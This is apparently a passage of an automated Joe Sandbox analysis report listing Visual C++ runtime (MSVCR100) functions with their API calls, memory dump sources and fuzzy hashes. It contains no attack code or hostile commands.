                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                            • Part of subcall function 6FDD4EBE: __p__iob.MSVCR100(6FDD4EB5,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4EBE
                                                                                                          • __p__iob.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DCD
                                                                                                          • __p__iob.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DE0
                                                                                                          • _fgetwc_nolock.MSVCR100(00000000,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4DE6
                                                                                                          • __p__iob.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E2B
                                                                                                          • _fgetwc_nolock.MSVCR100(00000000,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E31
                                                                                                          • __p__iob.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E5D
                                                                                                          • _fgetwc_nolock.MSVCR100(00000000,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E63
                                                                                                          • _errno.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E7C
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E87
                                                                                                          • _local_unwind4.MSVCR100(6FE24610,?,000000FE,6FDD4ED0,00000014,6FDD4EFE,?,?,00000000), ref: 6FDD4E97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __p__iob$_fgetwc_nolock$_errno_invalid_parameter_noinfo$_invalid_parameter_local_unwind4
                                                                                                          • String ID:
                                                                                                          • API String ID: 3505425107-0
                                                                                                          • Opcode ID: 0346c3170767eed59fcb00e77566b8ee8157843075a7950bc77472746b4b4e13
                                                                                                          • Instruction ID: 0fd2900f866be96abc171df4df73b2f9af79f37a91fb76d30cd8382ddd3b8519
                                                                                                          • Opcode Fuzzy Hash: 0346c3170767eed59fcb00e77566b8ee8157843075a7950bc77472746b4b4e13
                                                                                                          • Instruction Fuzzy Hash: A8316D70914355EADBA09FB4D8417AD77B0BF06328F20462AF469EB2C0DB39F5808B75
                                                                                                          Function 6FDD86A1 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 117COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD86B2
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,6FE28448,00000012,00000000), ref: 6FDD86CD
                                                                                                          • _lock.MSVCR100(00000002,6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD86DB
                                                                                                          • _waccess_s.MSVCR100(6FE28448,00000000,6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD8721
                                                                                                          • _errno.MSVCR100(6FDD87E8,00000010,6FDD883A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD87BF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_lock_waccess_s
                                                                                                          • String ID: "
                                                                                                          • API String ID: 2132282830-123907689
                                                                                                          • Opcode ID: 21c0553eab269b46701bcb1e32951143f7c338a82e52f06f036996fcb14332be
                                                                                                          • Instruction ID: 2c61e3ed8a1fa056a4e716e346c0372a6ab6d41d1b81ca3af05b00b19abf853e
                                                                                                          • Opcode Fuzzy Hash: 21c0553eab269b46701bcb1e32951143f7c338a82e52f06f036996fcb14332be
                                                                                                          • Instruction Fuzzy Hash: F631D37598C35AFBDB926F64C880A9E37B0AF05324F10641AF9246B6C0D770B9818B61
                                                                                                          Function 6FDD69D6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD69E7
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,6FE283F4,00000012), ref: 6FDD6A02
                                                                                                          • _lock.MSVCR100(00000002,6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD6A10
                                                                                                          • _access_s.MSVCR100(6FE283F4,00000000,6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD6A55
                                                                                                          • _errno.MSVCR100(6FDD6B18,00000010,6FDD6B6A,00000000,?,00000002,7FFFFFFF,00000000), ref: 6FDD6AED
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_access_s_lock
                                                                                                          • String ID: "
                                                                                                          • API String ID: 1561533809-123907689
                                                                                                          • Opcode ID: 5565ecfba9f71cf93f5bc5125b02fa5d51baa03ce75e7befe0b6980afefbe354
                                                                                                          • Instruction ID: 78e1c00015d7144f452954e4fb85ae6e14efaf90fb9fc7808ea1e0d203a2fc97
                                                                                                          • Opcode Fuzzy Hash: 5565ecfba9f71cf93f5bc5125b02fa5d51baa03ce75e7befe0b6980afefbe354
                                                                                                          • Instruction Fuzzy Hash: 6931F475944356DFDB94AF64C88059D3BB0AF07358F11A42AF4A06F2C0EB34B8818BE1
                                                                                                          Function 6FDC0856 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 83COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FDC0889
                                                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 6FDC088F
                                                                                                          • DuplicateHandle.KERNEL32(00000000), ref: 6FDC0892
                                                                                                          • GetLastError.KERNEL32 ref: 6FDC089C
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000), ref: 6FDC08B4
                                                                                                          • _CxxThrowException.MSVCR100(6FDB38A8,6FE20C0C,?), ref: 6FDC08C2
                                                                                                          • ??2@YAPAXI@Z.MSVCR100(0000000C,6FDB38A8,6FE20C0C,?), ref: 6FDC08C9
                                                                                                          • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(6FDB38A8,6FE20C0C,?), ref: 6FDC08DC
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDC092E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@CurrentProcess$??0exception@std@@??0scheduler_resource_allocation_error@??2@AcquireDuplicateErrorExceptionHandleLastLock@details@ReaderThrowWrite@_Writer
                                                                                                          • String ID: eventObject
                                                                                                          • API String ID: 349983990-1680012138
                                                                                                          • Opcode ID: c6b6a1c493d88db50ff1131991eec9374b2e4a9dddbefc0a0ff21609accff70b
                                                                                                          • Instruction ID: e20795112b5c6ea7c596715a42b76ffa645c029fdf73f8225b5f205e4cfa6fca
                                                                                                          • Opcode Fuzzy Hash: c6b6a1c493d88db50ff1131991eec9374b2e4a9dddbefc0a0ff21609accff70b
                                                                                                          • Instruction Fuzzy Hash: 88318EB5A00715EFDB80DFA8C984A8A7BFCFF08350B10952AE515D7680D770F914CBA1
                                                                                                          Function 6FDDED85 Relevance: 16.7, APIs: 11, Instructions: 202COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDEDB9
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDEDC3
                                                                                                          • _strnset_s.MSVCR100(?,?,?,?,?), ref: 6FDDEDEC
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEE2A
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEE56
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDEE67
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEEA1
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEEC8
                                                                                                          • _ismbblead_l.MSVCR100(?,?,?), ref: 6FDDEF0B
                                                                                                          • _errno.MSVCR100(?), ref: 6FDDEF62
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDDEF6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _ismbblead_l$_errno$_invalid_parameter_noinfo$_strnset_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1238685693-0
                                                                                                          • Opcode ID: 451579e326fb501774bd7600a0189bfbc49a95f233c43c65bca1681ec20d64c1
                                                                                                          • Instruction ID: de2143b9fdde55933e9f12b2e3a9adba834ac44ade2b98d6a739d0ef66cab518
                                                                                                          • Opcode Fuzzy Hash: 451579e326fb501774bd7600a0189bfbc49a95f233c43c65bca1681ec20d64c1
                                                                                                          • Instruction Fuzzy Hash: 61715B7180838ADFDF918FA8D8505EDFBB4AF05314F1446AFF4A0A6181D776B184DBA1
                                                                                                          Function 6FDDEB9D Relevance: 16.7, APIs: 11, Instructions: 202stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEBCC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEBD6
                                                                                                          • _errno.MSVCR100(00000000,00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEBF5
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEBFF
                                                                                                          • strncpy_s.MSVCR100(00000001,00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000000,00000001,6FE27C68), ref: 6FDDEC23
                                                                                                          • _ismbblead_l.MSVCR100(00000000,00000000,00000001,00000000,00000001), ref: 6FDDEC88
                                                                                                          • _ismbblead_l.MSVCR100(00000000,00000000,00000001,00000000,00000001), ref: 6FDDECC4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_ismbblead_l$strncpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3716565480-0
                                                                                                          • Opcode ID: 628cac0a7c0b1ed7b3fe3b8fc810f148128c6eee4298a4ab95a69a191a3dcd02
                                                                                                          • Instruction ID: f80ee50bcfadbabdc40dfbaae5371c3e4a0bbb6eb09b37ec96d053fc124ba180
                                                                                                          • Opcode Fuzzy Hash: 628cac0a7c0b1ed7b3fe3b8fc810f148128c6eee4298a4ab95a69a191a3dcd02
                                                                                                          • Instruction Fuzzy Hash: 31610230A09356DFDB929F7C888479DFBA4AF023A8F140656F4A19F1D1DB31B841C7A2
                                                                                                          Function 6FDCC475 Relevance: 16.6, APIs: 11, Instructions: 66threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDCC485
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCC490
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __set_flsgetvalue.MSVCR100 ref: 6FDCC49B
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000214), ref: 6FDCC4A7
                                                                                                          • _getptd.MSVCR100 ref: 6FDCC4B4
                                                                                                          • _initptd.MSVCR100(00000000,?), ref: 6FDCC4BD
                                                                                                          • CreateThread.KERNEL32(00000000,?,6FDCC41C,00000000,00000004,00000000), ref: 6FDCC4DB
                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 6FDCC4EB
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCC4F6
                                                                                                          • free.MSVCR100(00000000), ref: 6FDCC4FF
                                                                                                          • _dosmaperr.MSVCR100(00000000), ref: 6FDCC50A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$CreateErrorLastResume__set_flsgetvalue_calloc_crt_dosmaperr_errno_getptd_initptd_invalid_parameter_invalid_parameter_noinfofree
                                                                                                          • String ID:
                                                                                                          • API String ID: 797981675-0
                                                                                                          • Opcode ID: 0781a7132ff117e3511a21d66c46df90aeb3404e6fea079a8d107b2fe807c67e
                                                                                                          • Instruction ID: 34f66f99c91b7d49270a39a779926980e73ff2cec32a118ed3d0b518b23a2cf0
                                                                                                          • Opcode Fuzzy Hash: 0781a7132ff117e3511a21d66c46df90aeb3404e6fea079a8d107b2fe807c67e
                                                                                                          • Instruction Fuzzy Hash: 1F11E536105B90ABD7912B759C49E9B3BACDF827B8B11461AF7349B1C0DF71F80146B2
                                                                                                          Function 6FD96F4C Relevance: 16.3, APIs: 13, Instructions: 88COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96F69
                                                                                                            • Part of subcall function 6FD8014E: HeapFree.KERNEL32(00000000,00000000,?,6FDA7602,00000000), ref: 6FD80164
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96F7B
                                                                                                          • free.MSVCR100(00000000,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96F8D
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96F9F
                                                                                                          • free.MSVCR100(6FD843AA,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FB1
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FC3
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FD5
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FE7
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD96FF9
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD9700B
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD9701D
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD9702F
                                                                                                          • free.MSVCR100(?,?,?,6FD96F0C,?,?,6FD843AA,-0000006C,?,?,6FD8A3E1,-0000006C,-0000006C,?,?,6FD85294), ref: 6FD97041
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 32654580-0
                                                                                                          • Opcode ID: 90e3849cff4c7cdbd70ca706056b9b33bf9712ae8027eb675bba72c2a25b6e13
                                                                                                          • Instruction ID: 2f4efa2ff95086aa42d85c8504b6d9bbcbf0a5cc866554604365b7eafbf24803
                                                                                                          • Opcode Fuzzy Hash: 90e3849cff4c7cdbd70ca706056b9b33bf9712ae8027eb675bba72c2a25b6e13
                                                                                                          • Instruction Fuzzy Hash: 9A215332515F08DB8B98DFA4E589C5A7BEABB073707201906F06DD7594DB30F8C08AA4
                                                                                                          Function 6FDFFFFA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6FE00017
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6FE00021
                                                                                                          • _errno.MSVCR100(?,?,00000016,?,0000002D,00000000,000000FF,?,?,?,?,?,?,?,?,000000A3), ref: 6FE00052
                                                                                                          • strcpy_s.MSVCR100(?,000000FF,e+000,?,?,?,00000016,?), ref: 6FE000CE
                                                                                                          • memmove.MSVCR100(?,0000000C,00000003,?,00000016,?), ref: 6FE00132
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,00000016,?), ref: 6FE00155
                                                                                                            • Part of subcall function 6FDFFE57: $I10_OUTPUT.MSVCR100(?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?,?,000000A3,?), ref: 6FDFFE98
                                                                                                            • Part of subcall function 6FDFFE57: strcpy_s.MSVCR100(6FE00196,?,?,?,?,00000016,?,?,?,6FE00196,00000000,?,?,000000FF,00000016,?), ref: 6FDFFEB8
                                                                                                          • _errno.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE0019D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,000000A3,?,?,?,?,000000FF,?,?,?,?,00000000,00000000), ref: 6FE001A4
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfostrcpy_s$I10__invalid_parameter_invoke_watsonmemmove
                                                                                                          • String ID: e+000
                                                                                                          • API String ID: 1265084406-1027065040
                                                                                                          • Opcode ID: 7cb72da03fbfc1feff2dddd050dc3a817bd74fe419403fef71c2eb846f66b0fc
                                                                                                          • Instruction ID: ec456a199288fc29db3e28dcf26e701a5d14c79bf62a19554abd592dc687e584
                                                                                                          • Opcode Fuzzy Hash: 7cb72da03fbfc1feff2dddd050dc3a817bd74fe419403fef71c2eb846f66b0fc
                                                                                                          • Instruction Fuzzy Hash: DF515631604349DFCB01EF78C880BDA7FB1AF06328F2499AAE5658B2C1D771E951CB61
                                                                                                          Function 6FDF4532 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 92COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _getptd.MSVCR100(E06D7363,6FDB2708,E06D7363,1FFFFFFF,19930522), ref: 6FDF454B
                                                                                                          • _getptd.MSVCR100 ref: 6FDF4559
                                                                                                          • _encoded_null.MSVCR100 ref: 6FDF4564
                                                                                                            • Part of subcall function 6FD8B377: EncodePointer.KERNEL32(00000000,6FDFB6A5,6FE27D70,00000314,00000000,?,?,?,?,?,6FDCC18D,6FE27D70,Microsoft Visual C++ Runtime Library,00012010), ref: 6FD8B379
                                                                                                          • ?_inconsistency@@YAXXZ.MSVCR100 ref: 6FDF45A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$?_inconsistency@@EncodePointer_encoded_null
                                                                                                          • String ID: MOC$RCC$csm$csm$csm
                                                                                                          • API String ID: 2844665667-4235121399
                                                                                                          • Opcode ID: 4556b758dc037a0cb09d0cc75ab9fa2f62d2385d820a12c57b0301bea41d85e2
                                                                                                          • Instruction ID: 5c9954e1918b2dbb43d720c80d80cb1864175367b65ee4309fccd34e759e64f4
                                                                                                          • Opcode Fuzzy Hash: 4556b758dc037a0cb09d0cc75ab9fa2f62d2385d820a12c57b0301bea41d85e2
                                                                                                          • Instruction Fuzzy Hash: DD314832802249EFDF41DF54CA40EEDBBB5FF45318F164095E9146B290D335BAA2DBA1
                                                                                                          Function 6FD924DC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock.MSVCR100(00000007,6FD92588,0000000C), ref: 6FD924EA
                                                                                                            • Part of subcall function 6FD80910: EnterCriticalSection.KERNEL32(00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD8092B
                                                                                                          • wcslen.MSVCR100(00000000,6FD92588,0000000C), ref: 6FD92541
                                                                                                          • wcscpy_s.MSVCR100(?,?,00000000,6FD92588,0000000C), ref: 6FD9255F
                                                                                                          • _errno.MSVCR100(6FD92588,0000000C), ref: 6FDB0885
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD92588,0000000C), ref: 6FDB088F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
